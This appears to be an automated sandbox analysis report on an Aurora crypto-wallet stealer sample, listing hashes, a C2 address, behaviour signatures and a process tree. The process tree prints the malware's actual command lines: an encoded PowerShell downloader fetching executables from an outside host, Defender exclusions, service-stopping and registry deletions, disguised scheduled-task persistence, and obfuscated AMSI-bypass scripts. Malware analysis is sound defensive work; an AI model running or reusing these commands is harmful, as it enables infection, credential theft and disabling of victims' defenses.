Analysis

  • max time kernel
    47s
  • max time network
    78s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2023 18:15

General

  • Target

    C4Launcher.exe

  • Size

    855KB

  • MD5

    18014fc649434b87bc636b177c3681fa

  • SHA1

    7b021861b19aa3f9d8ee155b0b7b7393e1e09b61

  • SHA256

    5602954abc2dc945783dcba2d749d801f88f790fca8b3eeef99ca493a2a2763b

  • SHA512

    46535652f7559da293c5e9e5c03d48d8417dea6e4d1012a67bae1b0da45c6c5ad76ea0d17968b87c6fbd3963b7708640136f8477ff69a867a3aeb4fd3b0dcd38

  • SSDEEP

    3072:NBAN1gjFgmYSg25SYDGFHUNR1ZvhfKEaO7j9fDgjMKs:4egmLgmCeNXfPJDQMKs

Malware Config

Extracted

Family

aurora

C2

107.182.129.73:8081

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2524
      • C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe
        "C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:452
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3376
            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
              5⤵
              • Executes dropped EXE
              PID:5072
            • C:\Users\Admin\AppData\Local\Temp\new2.exe
              "C:\Users\Admin\AppData\Local\Temp\new2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2652
              • C:\Windows\System32\Wbem\wmic.exe
                wmic os get Caption
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5004
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic path win32_VideoController get name"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4448
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4272
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic cpu get name"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1088
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic cpu get name
                  7⤵
                    PID:4168
              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                5⤵
                • Executes dropped EXE
                PID:840
              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:3656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4708
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1964
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1264
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4128
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:5064
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:2072
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            3⤵
              PID:2728
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
              3⤵
                PID:348
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                3⤵
                • Modifies security service
                PID:5080
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                3⤵
                  PID:4124
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  3⤵
                    PID:4348
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3532
                • C:\Windows\System32\dialer.exe
                  C:\Windows\System32\dialer.exe
                  2⤵
                    PID:1836
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:RfaPJhzQhpuS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hXMhuwMZJXmmCu,[Parameter(Position=1)][Type]$NWzvNwSFYU)$cyXVbTqaKkI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+'gat'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+'oC'+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$cyXVbTqaKkI.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+'B'+''+'y'+'Si'+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$hXMhuwMZJXmmCu).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$cyXVbTqaKkI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+'i'+'d'+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+'S'+'l'+'o'+[Char](116)+','+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$NWzvNwSFYU,$hXMhuwMZJXmmCu).SetImplementationFlags('Run'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $cyXVbTqaKkI.CreateType();}$RckJpzTDZhdzD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](82)+'c'+[Char](107)+'Jp'+'z'+''+'T'+''+[Char](68)+''+[Char](90)+''+[Char](104)+''+[Char](100)+''+[Char](122)+''+'D'+'');$WRvMWUOkMbkOwN=$RckJpzTDZhdzD.GetMethod(''+[Char](87)+''+'R'+''+[Char](118)+''+[Char](77)+''+[Char](87)+''+[Char](85)+''+[Char](79)+''+'k'+'M'+'b'+''+[Char](107)+''+[Char](79)+''+[Char](119)+''+'N'+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QCezmhSvGxLtSjyyuBr=RfaPJhzQhpuS @([String])([IntPtr]);$CSpzGtLkvfKgiLroARWuqU=RfaPJhzQhpuS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MdzpHjzyxxa=$RckJpzTDZhdzD.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$XaQtQNPjxGbzWs=$WRvMWUOkMbkOwN.Invoke($Null,@([Object]$MdzpHjzyxxa,[Object](''+[Char](76)+''+[Char](111)+'ad'+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$iKrudNXtoKcQwkwYf=$WRvMWUOkMbkOwN.Invoke($Null,@([Object]$MdzpHjzyxxa,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+'ct')));$VbmPyyJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XaQtQNPjxGbzWs,$QCezmhSvGxLtSjyyuBr).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$FhJUaMqUqByBKxIlP=$WRvMWUOkMbkOwN.Invoke($Null,@([Object]$VbmPyyJ,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ibKVJNeqJk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKrudNXtoKcQwkwYf,$CSpzGtLkvfKgiLroARWuqU).Invoke($FhJUaMqUqByBKxIlP,[uint32]8,4,[ref]$ibKVJNeqJk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$FhJUaMqUqByBKxIlP,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKrudNXtoKcQwkwYf,$CSpzGtLkvfKgiLroARWuqU).Invoke($FhJUaMqUqByBKxIlP,[uint32]8,0x20,[ref]$ibKVJNeqJk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                  1⤵
                    PID:4404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rXsLYvEfnyEK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ESArgRzlREbwGz,[Parameter(Position=1)][Type]$RnfOCqpWCN)$lgWLqYUyixp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+'dDe'+'l'+'e'+'g'+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+'e'+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'e'+''+[Char](97)+'l'+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$lgWLqYUyixp.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+'N'+'a'+''+'m'+'e'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g'+','+'Pu'+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$ESArgRzlREbwGz).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$lgWLqYUyixp.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+','+''+'N'+'ew'+[Char](83)+''+'l'+'o'+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$RnfOCqpWCN,$ESArgRzlREbwGz).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $lgWLqYUyixp.CreateType();}$MGKZuAwrETHVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+'Win'+[Char](51)+'2'+[Char](46)+'U'+[Char](110)+''+'s'+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](77)+''+[Char](71)+''+'K'+''+'Z'+'u'+[Char](65)+''+'w'+''+[Char](114)+''+[Char](69)+''+'T'+''+[Char](72)+''+[Char](86)+''+'F'+'');$sULhEiLQZdqNBA=$MGKZuAwrETHVF.GetMethod('s'+'U'+''+[Char](76)+''+[Char](104)+''+[Char](69)+''+[Char](105)+'L'+[Char](81)+''+[Char](90)+'d'+[Char](113)+'N'+[Char](66)+''+[Char](65)+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QKKeHUDVNqceBEPqHss=rXsLYvEfnyEK @([String])([IntPtr]);$UUfrTvdIDxAkcKxnRfwaqY=rXsLYvEfnyEK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BwFIMgaPHRV=$MGKZuAwrETHVF.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+'l')));$nLgXLfZbHPbVkx=$sULhEiLQZdqNBA.Invoke($Null,@([Object]$BwFIMgaPHRV,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$BpyzprTQczrUDppMP=$sULhEiLQZdqNBA.Invoke($Null,@([Object]$BwFIMgaPHRV,[Object](''+'V'+'i'+'r'+'t'+'u'+'a'+[Char](108)+'P'+[Char](114)+'ote'+[Char](99)+'t')));$DBdUuza=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nLgXLfZbHPbVkx,$QKKeHUDVNqceBEPqHss).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$mRIqtdkyqSGmdrMly=$sULhEiLQZdqNBA.Invoke($Null,@([Object]$DBdUuza,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'er')));$iyFmyMdNAJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BpyzprTQczrUDppMP,$UUfrTvdIDxAkcKxnRfwaqY).Invoke($mRIqtdkyqSGmdrMly,[uint32]8,4,[ref]$iyFmyMdNAJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mRIqtdkyqSGmdrMly,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BpyzprTQczrUDppMP,$UUfrTvdIDxAkcKxnRfwaqY).Invoke($mRIqtdkyqSGmdrMly,[uint32]8,0x20,[ref]$iyFmyMdNAJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+'ia'+'l'+''+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                    1⤵
                      PID:2512
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{3e92c1e1-dff2-466a-9fa9-94f072d7f1cc}
                      1⤵
                        PID:2476

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

